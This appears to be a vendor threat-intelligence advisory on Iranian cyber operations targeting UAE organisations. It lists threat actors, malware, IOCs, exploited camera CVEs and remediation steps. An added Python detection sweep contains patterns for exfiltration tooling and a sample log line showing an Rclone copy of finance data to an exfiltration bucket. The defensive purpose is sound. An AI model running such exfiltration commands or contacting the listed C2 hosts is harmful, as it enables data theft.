
CyberShelter Emergency Threat Intelligence Update: Escalating Iranian Cyber Operations Targeting UAE Organizations Amid Ongoing Regional Military Conflict

CyberShelter threat intelligence analysts are tracking coordinated cyber activity involving Iranian state-aligned APT groups, destructive malware campaigns, and proxy hacktivist operations targeting UAE government, financial, aviation, and infrastructure networks following the escalation of regional hostilities.

Threat Level: CRITICAL
Conflict Status: ACTIVE REGIONAL CONFLICT
Published: 13 March 2026
Version: 1.0 – LIVE ADVISORY
Source: CyberShelter Threat Intelligence & NSOC

Conflict Trigger

On 28 February 2026, the United States and Israel launched coordinated military operations known as Operation Epic Fury / Operation Roaring Lion, targeting Iranian nuclear infrastructure, military leadership, and strategic facilities.

Following these strikes, Iran initiated retaliatory missile, drone, and cyber operations across the Middle East, targeting multiple countries including:

  • United Arab Emirates
  • Bahrain
  • Qatar
  • Kuwait
  • Saudi Arabia
  • Jordan
  • Israel

Cyber operations began simultaneously with kinetic military retaliation, marking the start of an active hybrid conflict environment combining physical warfare and cyber operations.

Situation Overview: UAE Under Active Cyber Targeting

CyberShelter threat intelligence monitoring confirms that UAE organizations are currently within the targeting scope of multiple Iranian cyber actors and affiliated hacktivist groups.

This is not a theoretical risk scenario. Multiple incidents affecting UAE infrastructure have already been observed.

Confirmed Cyber Activity (28 Feb – 13 Mar 2026)

| Date | Incident | Actor | Impact |
|---|---|---|---|
| 28 Feb – 5 Mar | Missile strike on AWS regional data centers | IRGC | Cloud disruption affecting UAE & Bahrain |
| 28 Feb – 2 Mar | 149 coordinated DDoS attacks across 16 countries | Multiple pro-Iran groups | Government, telecom, finance sectors |
| 28 Feb | Abu Dhabi Civil Defense Authority DDoS | Sylhet Gang | Government service disruption |
| Late Feb | UAE airport targeted with DDoS | DieNet | Aviation infrastructure disruption |
| Feb–Mar | Mass DDoS campaign against Gulf ministries (#Op_Epstein_Gulf) | Keymous+ | UAE government portals |
| Pre-2026 | Multiple UAE companies compromised | MuddyWater | Data exfiltration via exposed C2 infrastructure |
| 2024–2026 | Energy & communications intrusions | APT33 | Backdoor deployment |
| Ongoing | Exploitation of Hikvision/Dahua cameras | Agrius / Handala | Surveillance infrastructure targeting |

Intelligence Assessment

CyberShelter assesses that UAE organizations are facing a multi-layer cyber threat environment driven by regional conflict escalation.

Three attack layers are currently active:

1. Hacktivist Disruption Operations

  • DDoS attacks
  • Website defacements
  • Psychological influence campaigns

2. Espionage and Network Intrusions

  • MuddyWater implants pre-positioned in networks
  • Credential harvesting and long-term reconnaissance

3. Destructive Cyber Operations

  • Wiper malware
  • Ransomware-wiper hybrids
  • Infrastructure sabotage attempts

Threat intelligence partners including Cisco Talos, Palo Alto Unit 42, and BeyondTrust assess the next 14–30 days as the highest risk period for escalation.

Why the UAE Is Being Targeted

Iranian cyber strategy targets countries based on geopolitical alignment and strategic impact.

Several factors place UAE organizations in a high-priority targeting category.

Strategic Drivers

Military Alignment

The UAE hosts major U.S. military assets and CENTCOM operations, making it a retaliatory target.

Abraham Accords

UAE normalization with Israel places it within Iran’s perceived regional adversary coalition.

Regional Financial Hub

Disruption of UAE financial infrastructure would create significant geopolitical and economic impact.

Energy Infrastructure

UAE oil and gas infrastructure remains a long-standing target for Iranian cyber actors.

Aviation and Logistics

Airports and logistics hubs are strategic targets capable of disrupting regional supply chains.

Iranian Cyber Threat Ecosystem Targeting the UAE

Iran’s cyber operations involve both state-directed APT groups and affiliated hacktivist proxies.

Key Threat Actors

| Actor | Affiliation | Primary Capability | Status |
|---|---|---|---|
| MuddyWater | MOIS | Espionage & persistence implants | ACTIVE |
| APT33 | IRGC | Aerospace & energy targeting | ELEVATED |
| APT34 | IRGC/MOIS | Credential theft & web shells | ACTIVE |
| Agrius | MOIS | Wiper attacks | ACTIVE |
| Void Manticore / Handala | MOIS | Wiper campaigns | ACTIVE |
| Pioneer Kitten | IRGC | Ransomware + espionage | ACTIVE |
| CyberAv3ngers | IRGC | ICS/OT targeting | ELEVATED |
| DieNet | Hacktivist | Aviation DDoS attacks | ACTIVE |
| Keymous+ | Hacktivist | Government DDoS campaigns | ACTIVE |

Destructive Malware Threats in the Current Conflict

Several destructive malware families associated with Iranian actors are active in the current threat landscape.

ZeroShred Wiper

Associated with Void Manticore / Handala Hack

Capabilities:

  • Large-scale device wipe operations
  • Credential theft using Rhadamanthys infostealer
  • Abuse of Microsoft Intune device management systems

A recent attack wiped over 200,000 managed devices globally using this technique.

Sicarii Ransomware-Wiper

  • Appears as ransomware but destroys decryption keys
  • Victims cannot recover data even if ransom is paid
  • Targeting organizations across the Middle East, Turkey, and Africa

Agrius Pseudo-Ransomware Campaigns

Malware used:

  • DEADWOOD
  • Apostle
  • Fantasy wiper

These attacks disguise destructive malware as ransomware to delay response and create confusion.

Active Campaign: Operation Olalampo (MuddyWater)

CyberShelter monitoring confirms Operation Olalampo, an active MuddyWater campaign targeting organizations across the Middle East including the UAE.

Attack Chain

  1. Spear-phishing emails with malicious Office attachments
  2. Macro-based execution of initial payload
  3. Deployment of GhostFetch downloader
  4. Installation of GhostBackDoor or CHAR backdoor
  5. Persistence using AnyDesk RMM tools
  6. Data exfiltration via Rclone to cloud storage

Newly Observed Malware

| Malware | Type | Capability |
|---|---|---|
| GhostFetch | Downloader | Anti-analysis evasion |
| GhostBackDoor | Backdoor | Interactive shell |
| CHAR | Rust malware | Telegram C2 |
| HTTP_VIP | Downloader | Deploys AnyDesk |
| DinDoor | JavaScript backdoor | Uses Deno runtime |
| FakeSet | Python backdoor | Cloud-based exfiltration |

Key Indicators of Compromise (IOCs)

Organizations should immediately monitor or block the following indicators.

C2 Infrastructure

  • codefusiontech[.]org
  • handala-hack[.]to
  • handala-redwanted[.]to

Malware Indicators

  • FMAPP.dll
  • gshdoc_release_X64_GUI.exe
  • sh.exe

Suspicious Tools

  • Rclone with Wasabi cloud storage
  • Unexpected AnyDesk installations
  • Deno runtime execution
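Added example (not part of the CyberShelter advisory): a small Python sweep that runs the IOCs and attack-chain tooling listed above over constructed DNS and process-creation log lines, so a SOC can see which steps of the Operation Olalampo chain an event set touches. The log format, the regex patterns for the tools, and the hostnames and paths are assumptions.

```python
from __future__ import annotations
import re
from typing import Iterable

# Indicators copied from the advisory's IOC section (defanged domains are refanged on input).
C2_DOMAINS = ("codefusiontech.org", "handala-hack.to", "handala-redwanted.to")
MALWARE_FILES = ("fmapp.dll", "gshdoc_release_x64_gui.exe", "sh.exe")
# Attack-chain tooling from the advisory: Office macro child process, AnyDesk RMM,
# Rclone pushing to Wasabi, Deno runtime (DinDoor). The patterns are assumptions.
TOOL_PATTERNS = {
    "rclone-wasabi-exfil": re.compile(r"rclone(\.exe)?\b.*wasabi", re.I),
    "anydesk-rmm": re.compile(r"anydesk", re.I),
    "deno-runtime": re.compile(r"\bdeno(\.exe)?\b", re.I),
    "office-macro-child": re.compile(r"parent=(winword|excel)\.exe", re.I),
}

def _token_in(token: str, text: str) -> bool:
    """Case-insensitive match that refuses to fire inside a longer name (e.g. bash.exe)."""
    return re.search(r"(?<![\w-])" + re.escape(token) + r"(?![\w-])", text, re.I) is not None

def classify(line: str) -> list[str]:
    """Return the indicator labels matched by a single log line (empty if clean)."""
    text = line.replace("[.]", ".")  # refang so defanged DNS logs still match
    hits = [f"c2-domain:{d}" for d in C2_DOMAINS if _token_in(d, text)]
    hits += [f"malware-file:{f}" for f in MALWARE_FILES if _token_in(f, text)]
    hits += [f"tool:{name}" for name, pat in TOOL_PATTERNS.items() if pat.search(text)]
    return hits

def scan(lines: Iterable[str]) -> dict[str, list[str]]:
    """Map each suspicious line to its hits; clean lines are dropped."""
    return {ln: hits for ln in lines if (hits := classify(ln))}

# Constructed sample events (assumed format: timestamp, source, key=value pairs).
SAMPLE_LOGS = [
    "2026-03-10T08:01:02Z dns query=codefusiontech[.]org client=10.0.4.17",
    "2026-03-10T08:01:09Z proc image=C:\\Users\\a\\AppData\\Local\\Temp\\sh.exe parent=WINWORD.EXE",
    "2026-03-10T08:03:40Z proc image=C:\\ProgramData\\AnyDesk\\AnyDesk.exe parent=sh.exe",
    "2026-03-10T08:15:00Z proc image=rclone.exe cmd='rclone copy D:\\finance wasabi:exfil-bkt'",
    "2026-03-10T08:16:11Z dns query=update.microsoft.com client=10.0.4.17",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOGS).items():
        print(", ".join(hits), "<-", line)
```

Matches on the Office-spawned payload, the AnyDesk install and the Rclone-to-Wasabi copy correspond to steps 2, 5 and 6 of the attack chain above, so a host hitting all three in sequence deserves immediate containment rather than a ticket.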

Actively Exploited Vulnerabilities

Iran-linked threat actors are exploiting several known vulnerabilities affecting surveillance devices and enterprise infrastructure.

| CVE | Product | Severity |
|---|---|---|
| CVE-2017-7921 | Hikvision Cameras | Critical |
| CVE-2021-36260 | Hikvision Cameras | Critical |
| CVE-2023-6895 | Hikvision Cameras | High |
| CVE-2025-34067 | Hikvision Security Platform | Critical |
| CVE-2021-33044 | Dahua Cameras | Critical |

Many of these vulnerabilities allow unauthenticated access to live camera feeds or full remote code execution.

Immediate Security Actions for UAE Organizations

Priority 1 (Within 24 Hours)

  • Harden Microsoft Intune administrative access
  • Block known command-and-control infrastructure
  • Disable Office macros from internet sources
  • Audit Hikvision and Dahua surveillance devices
  • Enforce phishing-resistant MFA for administrators

Priority 2 (Within 72 Hours)

  • Verify offline and air-gapped backups
  • Audit remote management tools
  • Patch internet-facing infrastructure
  • Review Intune device enrollment policies

Priority 3 (Within 7 Days)

  • Implement IT / OT network segmentation
  • Conduct destructive attack tabletop exercises
  • Review supply chain exposure
  • Strengthen threat intelligence sharing

CyberShelter Intelligence Assessment

CyberShelter assesses the current cyber threat landscape affecting the UAE as CRITICAL.

The combination of:

  • Active military conflict
  • Iranian cyber retaliation doctrine
  • Pre-positioned espionage implants
  • Hacktivist mobilization
  • Destructive malware capability

creates an environment where rapid escalation of cyber attacks is highly likely.

Organizations should transition from passive monitoring to active threat hunting and resilience planning.

Need Immediate Assistance?

CyberShelter NSOC provides 24/7 incident response, threat hunting, and cyber crisis support for organizations facing nation-state cyber threats.

Contact CyberShelter NSOC for emergency support.